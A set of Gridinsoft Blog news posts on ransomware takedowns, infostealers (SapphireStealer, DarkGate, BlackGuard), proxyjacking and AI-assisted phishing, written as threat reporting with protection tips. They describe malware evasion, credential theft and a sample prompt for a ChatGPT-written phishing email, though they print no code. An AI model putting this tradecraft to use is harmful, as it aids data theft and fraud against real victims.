Integris Health Patient Data Extortion

By December 24, Integris Health patients reported receiving extortion emails. The attackers, claiming to have exfiltrated the personal data of over 2 million individuals, demanded payment to prevent the sale of this information. The extortion emails included links to a dark website where around 4,674,000 records were purportedly available.

The website provided choices to either delete or view the data upon payment. However, it is unclear whether there are duplicate records among all of them. The compromised data comprised Social Security Numbers, birthdates, addresses, insurance, and employment details. This fact was confirmed by patients who identified their personal information in those emails.

Incident Background

In November 2023, Integris Health detected unauthorized activities within its network. An investigation revealed that an unidentified party accessed confidential patient files on November 28. It is unknown at this time exactly what information was compromised.

Integris Health reports that the investigation is still ongoing. However, given the attack’s scale, cybercriminals likely gained access to a wide range of data, including names, addresses, insurance policy numbers, dates of birth, medical records, and other personal information.

Integris Responds to Ransom Emails

Integris Health has updated its security advisory, warning patients against interacting with the extortion emails. Nevertheless, this incident follows a similar pattern to that observed in the Fred Hutchinson Cancer Center attack. It suggests a potential link between the threat actors.

The dilemma faced by victims is whether to pay the ransom to protect their identity. However, legends say that paying the ransom does not assure data security or deletion. It also potentially marks the payer as a target for future extortion attempts.

Is It A New Cybercrime Meta?

The tactic of contacting users whose data was leaked directly is rather new, but looks organic in the modern threat landscape. While ransomware gangs like BlackCat practice forcing the companies to pay by reporting the hacks to SEC, the hackers who stand behind the Integris hack opted for this peculiar approach. But overall, such unusual steps appear to be if not a new extortion method, then at least a way to enforce paying off the ransom.

The intimidation factor is what makes us blush most. When it comes to multi-billion dollar companies that are listed on stock exchanges – it is much more than just a feeling of embarrassment. It is unlikely for hackers to start texting all their victims, as such practice is simply counter-productive. With large companies, however, it is essential to expect and be ready for some unique new tricks hackers come up with.

The post Integris Health Hacked, Patients Receive Ransom Emails appeared first on Gridinsoft Blog.

Dharma Ransomware Actors Detained in Ukraine

In the statement on the official website, Europol claimed searches in 30 properties in 4 cities in Ukraine, namely Kyiv, Cherkasy, Vinnytsia and Rivne. During the action, law enforcement detained the key person of the malware group, and some other actors. Searches also resulted in seizing a huge amount of data related to the criminal activity.

Detained persons are charged with compromising corporate networks in more than 70 countries around the globe and cryptocurrency laundering. Using malicious phishing, vulnerability exploitation and tactics the like, hackers were penetrating the networks. Further, they were using other tools to expand their presence in the environment and launch the ransomware attack. Overall, cybercriminals encrypted over 250 servers of different companies, which resulted in multi-million euro losses.

Europol has proven the relationship of the suspects to Dharma and Hive (which is defunct at the moment) ransomware groups. Investigation also shows that hackers are as well related to the spread of MegaCortex and LockerGoga ransomware back in late 2019. Dharma is the most active among the named ransomware, which is still an outsider of the modern threat landscape.

This operation accomplishes the list of anti-cybercrime actions that take place in Ukraine. Back in 2021, key criminals who standed behind Emotet malware were detained. Another operation that year led to the imprisonment of several cybercriminals related to the same Dharma gang. And even now, amidst the war course, local law enforcement are able to effectively cooperate with international agencies and combat cybercrime.

Europol Detains Group Members – But Why?

As usual, physical detainment of cybercriminals took quite some time, and required a team of investigators to perform property searches. This apparently became a redundant practice over the last time, as law enforcement tends to combat cybercrime in a different way.

The “Duck Hunt” operation, performed by the FBI in summer 2023, took place exclusively in the cloud. Law enforcement managed to detect and seize the entire network of tier 2 command servers of QakBot and managed to delete the malware from infected devices. Same story happened to the IPStorm botnet: the FBI beheaded the network of infected systems by seizing the command server and detaining its creator.

Is this practice effective? Yes, as it disrupts the malware operations, and makes it impossible for hackers to move on. At the same time though hackers remain free, and nothing stops them from joining other cybercrime groups. While decreasing the activity for a short period of time, this approach does not make a lot of difference in the long run.

The post Dharma Ransomware Criminals Captured in Ukraine, Europol Reports appeared first on Gridinsoft Blog.

What is the Ragnar ransomware group?

Ragnar a.k.a.Ragnar_Locker or RagnarLocker is a cyber extortion gang that runs ransomware attacks on corporations. Doble extortion, ransom sum negotiated on the Darknet page – quite common practices among modern hacker groups. However, the gang is not likely to operate on the Ransomware-as-a-Service model – the one that is used by the vast majority of other gangs.

Key attack vectors used by these hackers consist of exploiting vulnerabilities in network protocols or cloud applications. Additionally, Ragnar is known for cooperating with cybercriminals who provide initial access. During their attack, ransomware deployment is not mandatory – there were cases when the attack was only about data exfiltration.

But why did law enforcement pay so much attention to RagnarLocker? Well, the answer becomes obvious when you have a look at the victims of this ransomware. Capcom, Campari, City of Antwerp, Energias de Portugal, ADATA – these and numerous other companies/municipalities were struck. It was not just about spooking small companies – they were regularly opting for serious targets.

RagnarLocker Shut Down By the FBI & European Law Enforcement

On October 19, Europol claimed the disruption of Ragnar Locker ransomware operations as the result of a successful operation. The latter consisted of locating and seizing the servers which belonged to the ransomware gang. This method repeats the one used by the FBI in the operation Duck Hunt, that took down the entire QakBot botnet in late August 2023.

Another similar event occurred days ago, when the Ukrainian Cyber Alliance wiped the network infrastructure of Trigona Ransomware. As I said in the introduction, this appears to be a new trend. And its adoption is understandable – it is much faster and still effective compared to detaining the key actors of the organised crime gang.

Currently, the visible effect of the infrastructure takedown is the banner on the Darknet negotiation site of RagnarLocker. Taking hands on the network infrastructure means not only making malware operations impossible. Most likely, all the decryption keys, along with the decryptor utilities hackers were offering for hundreds of thousands of dollars, are now in hands of law enforcement.

Is this the Ragnarok for Ragnar Locker?

The effect from complete confiscation of network infrastructure is hard to underestimate. Even though threat actors are not detained and can keep working, there is a lot of work to recover the servers. Moreover, the funding during this recovery is questionable – law enforcement could have accessed hackers’ crypto wallets as well.

My guess is that group members will simply move to other ransomware gangs, abandoning their own one. RagnarLocker never showed its passion towards the brand name, so there won’t be many stopping factors against this step. Though, we haven’t seen “full-fledged” gang dissolutions since Conti shutdown in 2022. Maybe, it will be different this time?

The post Ragnar Locker Ransomware Shutdown, Infrastructure Seized appeared first on Gridinsoft Blog.

What is Trigona Ransomware?

Trigona is a relatively new ransomware actor, active for around a year at the moment (since October 2022). Despite that, hackers demonstrate significant activity from the very beginning. By exploiting different vulnerabilities, particularly ones in MSSQL and popular software. They also do not disdain using compromised business emails, collected in early stages of an attack or even in previous hacks. Moreover, the gang attempted to stay in touch with the latest trends, and released a variant of their ransomware for Linux.

Thorough research shows that Trigona is probably an offspring of CryLock ransomware. Despite the group not claiming its shutdown, they went low for some time – and then Trigona emerged. The new group uses almost the same tools and tactics, thus it is logical to assume that one is a reborn of another. Other people point at certain relations with ALPHV/BlackCat gang, though it appears rather sporadically and is most likely a coincidence.

Trigona Ransomware Hacked by Ukrainian Cyber Alliance

On October 17, 2023, Telegram channel of Ukrainian Cyber Alliance posted information about Trigona ransomware servers being seized and disabled. This was accompanied by a screenshot of the Darknet leak site of the gang after the hack.

Ukrainian Cyber Alliance is a group of hacktivists that perform attacks on Russian cybercrime gangs. Being formed in 2014, they were an obvious response to the increased volume of Russian state-sponsored attacks upon Ukrainian infrastructure and companies. And, as you can see, they keep going even nowadays.

Posts on a related Telegram channel RUH8 uncovered some interesting details. As it turns out, hackers got access to Trigona’s Confluence account earlier this month – around October 12.

Though, posts on the RUH8 admin’s Twitter uncovered that Ukrainian hackers did not only hacked and defaced the Darknet site. Screenshots prove that Trigona’s backups are gone as well, which makes it rather difficult to get back online quickly enough. Another picture proves that all the credentials and internal data was exfiltrated and deleted from crooks’ servers.

One more screenshot from the same Twitter thread shows that the hacker got his hands on all the toolkit of cybercriminals. This means that sooner or later, the decryptor for the victims of Trigona ransomware will be available.

Is Trigona Trigone now?

Not yet. Despite getting such a severe strike, Trigona ransomware can still recover. Though, it will certainly take some time to get all the infrastructure back online. Moreover, crypto wallets are exposed as well, which question their further application for funding the operations. Key developers and masters should recover everything from scratch – and without a pay, the motivation will be quite low. The future of Trigona group is unclear.

This is not the first time a hacker group gets its network infrastructure wrecked. The recent operation ”Duck Hunt” by the FBI destroyed a huge botnet under the rule of QakBot. Though, feds did not seize tier 1 servers, where the vast majority of infrastructure is hosted – while Trigona has all things wiped at one snap. Overall, such operations may be pretty effective effort-wise, as ones that involve threat actors’ imprisonment and physical seizure of assets require way more reconnaissance, legal actions, real-world operations and the like. I expect to see much more of such in future.

The post Trigona Ransomware Hacked by Ukrainian Cyber Alliance appeared first on Gridinsoft Blog.

According to the research, SapphireStealer can steal a wide range of information from the target system, and be flexible in setup and evasion methods. Attackers can use the stolen information to launch attacks such as espionage or demand ransom payments through extortion.

How does SapphireStealer work?

Like many other malware that have recently emerged on the dark web, SapphireStealer is designed to collect information about the host, including browser data, files, and screenshots. The stolen data then exfiltrated as a ZIP file via a Simple Mail Transfer Protocol (SMTP).

What sets SapphireStealer apart is that its source code was made public in December 2022, making it easier for attackers to experiment with the malware and evade detection. They have even added new data exfiltration methods like using a Discord webhook or Telegram API.

SapphireStealer is written in .NET and offers straightforward but effective functionality. The information it can steal includes host information, screenshots, cached browser credentials, and files that match a predefined list of file extensions stored on the system.

Upon execution, the malware checks if any browser processes are currently running on the system. Then it scans the list of running processes for names that match the following:

• Chrome
• Yandex
• MS Edge
• Opera

If it detects any matches, the malware terminates the processes using Process.Kill(). Here is an example code snippet that shows how to accomplish this task specifically for Google Chrome.

A .NET malware downloader called FUD-Loader has been made public by the malware author. This downloader works as an add-on to the SapphireStealer module, making it capable of delivering other malware. It also allows you to receive additional binary payloads from servers controlled by intruders. The malware downloader has been used to deliver remote administration tools like DCRat, njRAT, DarkComet, and Agent Tesla.

How to avoid attacks from SapphireStealer ?

Here are some tips to reduce the risk attacks from SapphireStealer and similar stealers:

Install updates

It is crucial to promptly update the operating system, browser, and other applications to minimize the risk of infostealers being distributed via known browser vulnerabilities.

Use multi-factor authentication

Having Multi-factor authentication (MFA) enabled is an effective security measure in safeguarding accounts, tools, systems, and data repositories from unauthorized access. If an intruder manages to steal your login credentials, MFA will prompt a secondary layer of authentication, making it more challenging for them to enter the compromised account. Additionally, secure password storage can be a useful supplementary option to ensure utmost protection.

Avoid pirated software

Using pirated software can be dangerous as it often contains malware. Pirates do this to make money. It is always better to use legitimate applications. Nowadays, there are many free, freemium, and open-source alternatives available that remove the need to take the risk of using pirated software.

The post SapphireStealer: Stealthiness, Flexibility and Malware Delivery appeared first on Gridinsoft Blog.

DarkGate Malware Activity Spikes as Developer Rents Out It

According to cybersecurity researchers, a new DarkGate malware campaign made a fuss. It spreads through phishing emails and uses stolen email threads to trick users into clicking on a hyperlink that downloads the malware. Initial analysis indicates that this malware sample is very similar to the DarkGate malware. The initial infection routine and observed C2 communication protocol were nearly identical to past analyses of the same malware family. However, further research has confirmed that this sample is part of the DarkGate malware family, based on embedded strings and functionality. In addition, the recent surge in DarkGate malware activity is likely because the developer has rented out the malware to a few affiliates.

DarkGate Loader Details

DarkGate is malware sold primarily on underground forums by an user nicknamed RastaFarEye. This malware is designed to avoid detection by security software, and it can establish persistence through Windows Registry modifications to gain elevated privileges. As for damage – it steals data from web browsers, Discord, FileZilla, and other software and connects to a command-and-control (C2) server to perform tasks. Moreover, the task may include file enumeration, data exfiltration, launching cryptocurrency miners, capturing screenshots remotely, and executing other commands.

Spreading

Traditionally, phishing attacks have been the primary delivery route for malware; this case is no exception. In addition, according to some reports, 79% of malware in Q2 2023 was delivered via phishing emails. However, specialists have identified two explicit DarkGate contamination scenarios. The first method involves using an infection pattern wherein an MSI installer file is the initial payload. Thus, victims of this infection receive this file by clicking on a link included in a phishing message. This link leads to a traffic distribution system (TDS). As a result, it redirects the victim to the final payload URL for the MSI download if the attacker’s requirements are met. Upon opening the downloaded MSI file, the DarkGate infection is triggered.

In addition, experts have discovered samples of another campaign with a Visual Basic script to deliver the initial payload. However, experts do not precisely understand how the initial load is delivered to the victim. The script is obfuscated and contains decoy/junk code. Later, it invokes the curl binary that comes pre-installed with Windows to download the AutoIt executable and script file from a server controlled by the attacker. After that, the infection chain follows the previously described campaign.

Key Action of DarkGate Loader

DarkGate is a modular loader that can deliver a variety of payloads, including ransomware, botnets, trojans, keyloggers, spyware, and dll files. In other words, DarkGate Loader is a versatile and dangerous malware that can be used to deliver a variety of payloads. The loader waits for commands from the command server. When C2 sends a message containing the IP address of a secondary server, DarkGate can get the payload.

The malware uses DLL file format to run stealthily by loading the library to the memory using the system process called rundll32.exe or injecting it into an application with a bad to no DLL checkup. As a result, the malware steals confidential data such as passwords and cookies from the victim’s system. It targets web browsers, email software, and applications like Discord or FileZilla. The malware uses legitimate freeware tools published by Nirsoft to extract information, and it can access the operating system, the logged-on user, the currently running programs, and other data sources. This information is sent to the C2 server and is available in the threat actor’s panel. Additionally, the malware can collect arbitrary files from the victim system when requested through the C2 channel.

Defense evasion

After initialization, the malware proceeds to a function identified as the “C2 main loop.” In this loop, the malware periodically checks the C2 server for new instructions, executes the received commands, and sends back the results to the C2 server. The C2 main loop contains over 100 orders, including information gathering, self-management, self-update, stealer, crypto miner, RAT, and file management. The malware contains multiple functions to evade typical analysis tools. If the corresponding features are enabled, and the sample detects an environment that matches one of the checks, it will terminate the process. Moreover, the malware looks for multiple well-known AV products and may alter its behavior depending on the result. The discovered AV product is communicated back to the C2 server. The malware may also masquerade its presence and inject itself into legitimate Windows processes based on the used configuration.

Malware As a Service

Initially, the malware was only used privately by the developer. But now, malware authors offer it as a subscription service, with prices ranging from $1,000 per day to $15,000 per month to $100,000 per year. Moreover, the author claims that the malware is the “ultimate tool for pentesters/redteamers” and boasts of “features that you won’t find anywhere.” By the way, earlier versions of DarkGate also included a ransomware module. In any case, introducing the MaaS program will likely increase DarkGate malware campaigns, making it an ongoing threat in the future.

How to protect against DarkGate Loader?

Here are some tips on how to protect against DarkGate Loader:

• Keep your software up to date. Software updates often include security patches that can help protect your devices from malware.
• Be careful about what websites you visit and what links you click on. Malware, like DarkGate Loader, can spread through malicious websites and links.
• Use a firewall to block unauthorized access to your devices. This can help prevent DarkGate Loader from infecting your devices.
• Back up your data regularly. This way, if your devices are infected with DarkGate Loader, you can always restore your data from a backup.
• Use a strong password manager to create and store strong passwords for your online accounts.
• Enable two-factor authentication (2FA) for your online accounts. This will add an extra layer of security to your accounts.
• Use an anti-malware solution with up-to-date signatures. It will help detect and remove DarkGate Loader if it does manage to infect your device.

The post DarkGate Loader Expands Activity, Delivers Ransomware appeared first on Gridinsoft Blog.

Why Social Media Threaten Information Security?

Social media platforms serve as a means for users to stay connected with friends, engage with customers, and market businesses. However, a place with such a large information volume cannot be safe from manipulations or even outright phishing. Let’s peek at the most notorious examples of threats to infosec you can meet on social networks.

Risk of social engineering attacks.

Criminals are aware that individuals are likely to share personal information. Therefore they exploit public profiles to extract valuable data that can be utilized for advanced social engineering assaults.

It’s essential to consider employees’ personal social media accounts as they can impact business security. Cybercriminals can use any post made on a social media profile linked to the business to compromise the company’s systems and data. The information is usually publicly visible when a digital profile is created. The more information an individual shares on their profile, the higher the risk of falling victim to cybercrime.

Cybercriminals often exploit social media users by creating fake accounts to deceive them into providing personal information, access credentials, or downloading malicious software through links. It’s important to stay vigilant and cautious while using social network to avoid falling victim to such scams.

Oversharing

Individuals who frequently post personal information on social networking sites can threaten businesses. Their actions can not only put themselves at risk by sharing confidential information, such as travel plans, business data, or patient information but also provide cybercriminals with a plethora of information they can exploit in various ways. The posts only can threaten the information security of the individual or a company. Though it is only a peak of the iceberg.

• Whaling attacks involve gathering valuable information to target high-level executives and persuade them to perform a secondary action, such as transferring funds.
• Spear phishing attempts are more targeted and accurate than typical phishing attempts. They focus on individuals and use specific details like current news and relevant financial documents.
• Spoofing occurs when a cybercriminal pretends to be someone or something else to gain access to private information.

Social media connections can create a cybersecurity risk. User activity, including likes, shares, and comments, can reveal valuable information about relationships that cybercriminals can exploit for fraudulent activities like phishing, spoofing, and impersonation.

Unsecured Portable Devices

Mobile devices are obviously the prevalent way of accessing social media. Modern security measures implemented on both mobile devices and in social network create an impression of secureness, but it is in fact just a misconception. The key there is accessing the ones phone, laptop or another device – and then you get everything. Thing is, people often rely exclusively on biometric identification, hoping that no one will try to pick the password that remains as a backup access method if something goes wrong. And – you guessed it right – they leave some of the easiest passwords to pick, like “1111” or “1234”, making it a piece of cake for hackers. This makes social media a nightmare to information security.

After such a lockpicking game, those who access the device can access whatever info in social media. This is even more efficient than using spyware/stealer malware, which cannot dump conversations in most messengers. By accessing the chats, criminals can gather not just your sensitive data but also your schedule and the schedules of other people, your company’s internal affairs, and the like. If it is not a dream of a hacker who collects data about the target – so what is?

How to Reduce Cyber Risks Using Social Media

In today’s world, businesses must have an online presence, including at least one social media platform. Social network has become necessary for building trust, increasing visibility, receiving customer reviews, conducting research, making comparisons, and facilitating direct communication with customers. The good news is that businesses can take steps to reduce the cyber risks associated with social network.

• Social Media Access Control
  Limiting the number of people accessing social media accounts is essential as it reduces the potential attack surface. Identifying, containing, and mitigating the damage becomes more manageable in a data breach. Assigning one person to oversee the business’s social network accounts is advisable to minimize security risks.
• Social Media Policy Implementation
  It is essential for every member of an organization, including those in leadership positions, to have access to a well-defined social media policy. This policy should outline how to safeguard sensitive and confidential information and what actions are strictly prohibited.
• Anti-Malware Implementation
  When dealing with unverified mobile devices, addressing security vulnerabilities can be difficult. Therefore, it is crucial that social media training emphasizes the significance of having antivirus and anti-malware software on all portable devices to safeguard against cyber attacks. This software can mitigate or resolve security threats, protecting users and their organizations.

The rise of social media has changed how we communicate and exchange information, but it has also brought about new dangers and obstacles concerning privacy and security. It is crucial to be aware of what we share on social network and who has access to it, as well as to take measures to safeguard our data and keep ourselves informed about privacy concerns and security risks. By following recommended guidelines for using social media, such as reviewing privacy policies, modifying privacy settings, and being alert to fraudulent schemes and phishing attacks, we can reap the benefits of social media while mitigating the potential risks.

The post Information Security Threats in Social Media appeared first on Gridinsoft Blog.

What is proxyjacking?

Proxyjacking is an attacker’s illegal use of a victim’s bandwidth for its own good. The closest related process to proxyjacking is called cryptojacking. It involves an attacker illegally using the victim’s device power to mine cryptocurrency. There is nothing new under the sun, and although proxyjacking has been around for some time, it is only now that attackers have begun to use it so brazenly for profit.

First of all, cybercriminals can use proxy servers to cover their tracks. This makes it difficult to trace their illicit actions back to their origin by routing malicious traffic through multiple peer-to-peer nodes before reaching their final destination. Experts have found that financially motivated criminals actively attack vulnerable SSH servers. They aim to discreetly turn them into a proxy network, which they then rent out to other criminals. Because proxyjacking has little or no effect on overall system stability and usage, it is harder to detect.

Diving into details

Experts discovered these attacks on June 8, 2023, after hackers established multiple SSH connections to honeypots managed by the Security Intelligence Response Team (SIRT). By connecting to one of the vulnerable SSH servers, the hackers deployed a Base64 Bash script that added hacked systems to Honeygain or Peer2Profit. The script also deployed a container, downloading Peer2Profit or Honeygain Docker images and eliminating competitors’ containers, if any were found. In addition, researchers found cryptojacking miners, exploits, and hacking tools used to store the malicious script on the compromised server. In other words, the attackers either switched to proxyjacking or used it to generate additional passive income. Now we’ll explain in detail how it happened.

1. Penetration

By controlling a honeypot, experts could monitor the actions of attackers who used encoded Bash scripts. The attackers utilized a double Base64-encoding technique to obscure their activities. However, the researchers successfully decoded the script and gained insight into the attacker’s proxyjacking methods. Through careful analysis, they could understand the attacker’s intended operations.

2. Deploying

Thus, the compromised system transforms into a node in the Peer2Profit proxy network. Now it is using the account specified by $PACCT as the affiliate that will benefit from the shared bandwidth. The same was discovered for a Honeygain installation shortly after. The script is designed to be discreet and sturdy, attempting to operate regardless of the software installed on the host system. The script begins by defining a few functions for later use, including a basic curl implementation. This is then used within the second function to download an actual curl version (hosted on the distribution server as “csdark.css”). If curl is not present on the victim host, the attacker downloads it on their behalf, as it is all required for this scheme to work.

3. File analysis

The analysis shows it’s a basic curl version without significant modifications. Nevertheless, it may have additional features, but no evidence of harm exists. However, the ability to look at the source of the artifact explains it was part of a proxyjacking scheme. It emphasizes the importance of identifying all unusual artifacts. Next, the attacker creates a function that moves to a writable and executable location. If no appropriate directory is found, the executable terminates.

4. Eliminating competitors

The script has a final function that sets up the bot. However, this function is commented out in the main script and replaced with possibly more effective code. Most of the action happens in the rest of the code, with some parts redacted. The script starts by checking if its container is already running and then proceeds to kill any rival containers that are also sharing bandwidth. This process is repeated to ensure that no other rival containers are running.

Distribution server

Researchers traced an attack and discovered a compromised web server in Libya that distributed components for attacks. The server had outdated and unmaintained components, including a library called metro-bootstrap. Three files were last modified in 2014, while newer files suggested the server had been compromised. Researchers used `wget -r` to download all files for analysis. The csdark.css file was uploaded, followed by metro-bootstrap.min.xcss, and then vksp, which was later found to be a Linux-specific crypto-miner named perfcc. Analysis revealed that vksp contained a crypto-mining utility, exploits, and hacking tools. That suggests a pivot or supplementing of cryptojacking with proxyjacking. Hosted on the same website, these executables provide proof of actors who will capitalize on this monetization strategy.

Why do they do it?

In this campaign, Peer2Profit and Honeygain were the two P2P proxy monetization schemes discovered. Both have public Docker images with over 1 million downloads. Unfortunately, some potentially unscrupulous companies use these proxies for data collection and advertising, even though they are technically legitimate. Some companies allow users to see precisely how their traffic is being used. While these applications are not inherently harmful and are marketed as voluntary services that offer compensation in exchange for sharing unused internet bandwidth, some companies fail to properly verify the sourcing of the IPs in their network. Sometimes, they even suggest installing the software on work computers, which is risky.

How to avoid proxyjacking?

Initially, a proxy server is perfectly legitimate. Each user is free to provide bandwidth for any purpose. However, if this process occurs without the user’s knowledge, it becomes a cybercrime. Preventing unwanted things is not as difficult as it may seem at first glance. It’s enough to be cautious when using the Internet and adhere to the following recommendations:

• Use strong passwords. A strong password is the first line of defense. Therefore we recommend using a password generator to create a strong password. Also, you should avoid repeating the same password on different sites.
• Use two-factor authentication. Suppose your first line of defense is down. In that case, 2FA won’t let the attacker in further because he can’t access the confirmation code.
• Install all OS and software updates regularly. Software updates are patches for vulnerabilities through which attackers can also infiltrate your device.
• Use advanced anti-malware solutions. While a basic security tool satisfies most of the average user’s needs, you can use an advanced anti-malware tool. It’s a great addition to the Windows Protector and will protect your device from various attacks.

The post Proxyjacking: The Latest Cybercriminal Invention In Action appeared first on Gridinsoft Blog.

What is Social Engineering?

Social engineering – a method of manipulating fraudsters psychologically and behavior to deceive individuals or organizations for malicious purposes. The typical objective is to obtain sensitive information, commit fraud, or gain control over computer systems or networks through unauthorized access. To look more legitimate, hackers try to contextualize their messages or, if possible, mimic well-known persons.

Social engineering attacks are frequently successful because they take advantage of human psychology, using trust, curiosity, urgency, and authority to deceive individuals into compromising their security. That’s why it’s crucial to remain watchful and take security precautions, such as being careful of unsolicited communications, verifying requests before sharing information, and implementing robust security practices to safeguard against social engineering attacks.

ChatGPT and Social Engineering

Social engineering is a tactic hackers use to manipulate individuals into performing specific actions or divulging sensitive information, putting their security at risk. While ChatGPT could be misused as a tool for social engineering, it’s not explicitly designed for that purpose. Cybercriminals could exploit any conversational AI or chatbot for their social engineering attacks. If it used to be possible to recognize the attackers because of illiterate and erroneous spelling, now, with ChatGPT, it looks convincing, competent, and accurate.

Example of Answer from ChatGPT

To prevent abuse, the creators of OpenAI have implemented safeguards in ChatGPT. However, these measures can be bypassed, mainly through social engineering. For example, a harmful individual could use ChatGPT to write a fraudulent email and then send it with a deceitful link or request included.

This is an approximate request for ChatGPT: “Write a friendly but professional email saying there’s a question with their account and to please call this number.”

Here is the first answer from ChatGPT:

What is ChatGPT dangerous about?

There are concerns about using ChatGPT by cyber attackers to bypass detection tools. This AI-powered tool can generate multiple variations of messages and code, making it difficult for spam filters and malware detection systems to identify repeated patterns. It can also explain code in a way that is helpful to attackers looking for vulnerabilities.

In addition, other AI tools can imitate specific people’s voices, allowing attackers to deliver credible and professional social engineering attacks. For example, this could involve sending an email followed by a phone call that spoofs the sender’s voice.

ChatGPT can also create convincing cover letters and resumes that can be sent to hiring managers as part of a scam. Unfortunately, there are also fake ChatGPT tools that exploit the popularity of this technology to steal money and personal data. Therefore, it’s essential to be cautious and only use reputable chatbot sites based on trusted language models.

Protect Yourself Against AI-Enhanced Social Engineering Attacks

It’s important to remain cautious when interacting with unknown individuals or sharing personal information online. Whether you’re dealing with a human or an AI, if you encounter any suspicious or manipulative behavior, it’s crucial to report it and take appropriate ways to protect your personal data and online security.

1. Important to be cautious of unsolicited messages or requests, even if they seem to be from someone known.
2. Always verify the sender’s identity before clicking links or giving out sensitive information.
3. Use unique and strong passwords, and enable two-factor authentication on all accounts.
4. Keep your software and operating systems up to date with the latest security patches.
5. Lastly, be aware of the risks of sharing personal information online and limit the amount of information you share.
6. Utilize cybersecurity tools that incorporate AI technology, such as processing of natural language and machine learning, to detect potential threats and alert humans for further investigation.
7. Consider implementing tools like ChatGPT in phishing simulations to familiarize users with the superior quality and tone of AI-generated communications.

With the rise of AI-enhanced social engineering attacks, staying vigilant and following online security best practices is crucial.

The post ChatGPT has become a New tool for Cybercriminals in Social Engineering appeared first on Gridinsoft Blog.

BlackGuard Stealer – What is it?

BlackGuard is a classic infostealer malware, programmed in C#. It aims at grabbing personal data from web browsers, particularly seeking data related to cryptocurrency wallets. It first appeared in 2021, being promoted both on Darknet forums and in a dedicated Telegram community. A lifetime subscription for this malware costs $700, while a monthly subscription is available for $200. Its promotion campaign saw a major boost in 2022, when its competitor Raccoon went for a hiatus.

From its beginning, BlackGuard was aiming precisely at stealing crypto credentials, and this remained its bearing point in further updates. November 2022 patch brought overall improvements to the way malware gathers cryptocurrency-related data, but also introduces the ability to load other malware, i.e. act as a dropper. Patch notes published in the Telegram community contain information about a pack of other changes, mostly related to C2 connectivity.

Anti-analysis tactics

First notable thing about BlackGuard malware is its anti-analysis measures. BlackGuard typically arrives at a target device in an encrypted form. The encryption is done by a tool embedded into the admin panel of the malware. Additionally, its code is obfuscated in a pretty specific manner: base64-encoded strings are getting decoded only during the runtime. But even before the decoding, the strings are represented as an array of bytes – a completely unreadable one. Such a practice appears to be pretty effective against anti-malware programs that try to analyze the strings.

Malware also checks the computer name, seeking a match with the hardcoded list it brings among its code rows. These are the names typically applied to virtual machines or live systems used in virus analysis. If the one is detected, BlackGuard will cease any further execution. Debugging, however, also receives its treatment – malware can block any inputs if it detects the activity of a debug tool. Typically for all malware developed in Russia and ex-USSR countries, , this stealer refuses to run in ex-USSR countries.

Data stealing

Once all the checkups are passed, the malware starts its main course – credentials stealing. As I mentioned above, BlackGuard’s primary target is login information contained in web browsers, and one related to cryptocurrency wallets both as a browser extension and desktop application. It seeks the AppData/Local folder for the directories that belong to web browsers and applications. All the gathered data is located to a folder where malware is launched (usually Users/Temp). Before sending to a command server, malware packs that data into a protected .zip archive. It brings the password among its code rows.

List of web browsers attacked by BlackGuard

Crypto wallets attacked by BlackGuard

Desktop applications

Browser extensions

Other application

Additionally, BlackGuard is capable of collecting credentials from a row of VPN clients and FTP/SFTP utilities, desktop messenger apps, and Microsoft Outlook. Particularly, it grabs credentials from configuration files of NordVPN, OpenVPN and ProtonVPN. Steam and Discord are hacked in a similar manner, while Tox, Signal, Pidgin, Telegram and Element are getting all the conversation collected.

How to protect yourself?

There is only one consistent spreading method used by threat actors who operate BlackGuard – email spam. The latter, however, will likely have a form of spear phishing, that tries to resemble genuine mailing or even messages that its victim is waiting for. Most of the time, crooks gather information using OSINT about their victims for some time before sending messages.

The exact message contains an attached file, commonly an MS Office document. However, any file that can carry executable contents may be used. Office files gained popularity as VBS macro scripts they can carry is ignored by the vast majority of anti-malware software. Launching the file makes the script run: it contacts the command server, downloads the payload, and runs it. This obscenely simple scheme was disrupted by the introduction of Mark-of-the-Web. Using the latter, Microsoft marks potentially risky files, calling additional attention to anti-malware programs. Still, that feature is present only in the latest Windows versions, and as it usually happens, users do not haste to install it.

Another piece of advice to follow is to use anti-malware programs. Hackers do their best to make you believe the spam email or banner online. For that reason, it is better to exclude the human factor by using an automated solution that will not be fooled. But to be sure that such a sneaky thing as BlackGuard will not slip through, it is important for the security tool to have multi-layer protection. GridinSoft Anti-Malware can offer this to you – the program features a “classic” database-backed scanning, as well as a heuristic engine and AI-based detection system. All of them together create a reliable shield even against the most modern – and potent – threats.

The post BlackGuard Receives Update, Targets More Cryptowallets appeared first on Gridinsoft Blog.